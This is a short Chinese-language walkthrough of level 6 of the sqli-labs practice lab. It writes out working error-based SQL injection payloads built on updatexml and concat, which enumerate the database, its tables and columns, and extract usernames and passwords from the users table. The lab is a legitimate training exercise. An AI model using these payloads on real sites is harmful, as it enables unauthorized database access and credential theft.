sqli-lab 冲关记录
前言
摸了好久鱼,今天又更新一波
开冲
less6
首先注入1’
发现报错提示’“1"”
说明前面是"
所以我们注入
1" --+
即可闭合前面的"注释后面的代码
老规矩先查库名
?id=1" and updatexml(1,concat(’’,database(),’’),1) --+
接下来查询表名
?id=1" and updatexml(1,concat(’~’,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),’~’),1) --+
查询字段名:?id=1" and updatexml(1,concat(’~’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),’~’),1) --+
查询内容:?id=1" and updatexml(1,concat(’~’,substr((select group_concat(username,’ ‘,password) from users),1,30),’~’),1) --+
之后修改substr的第二位参数即
less6通关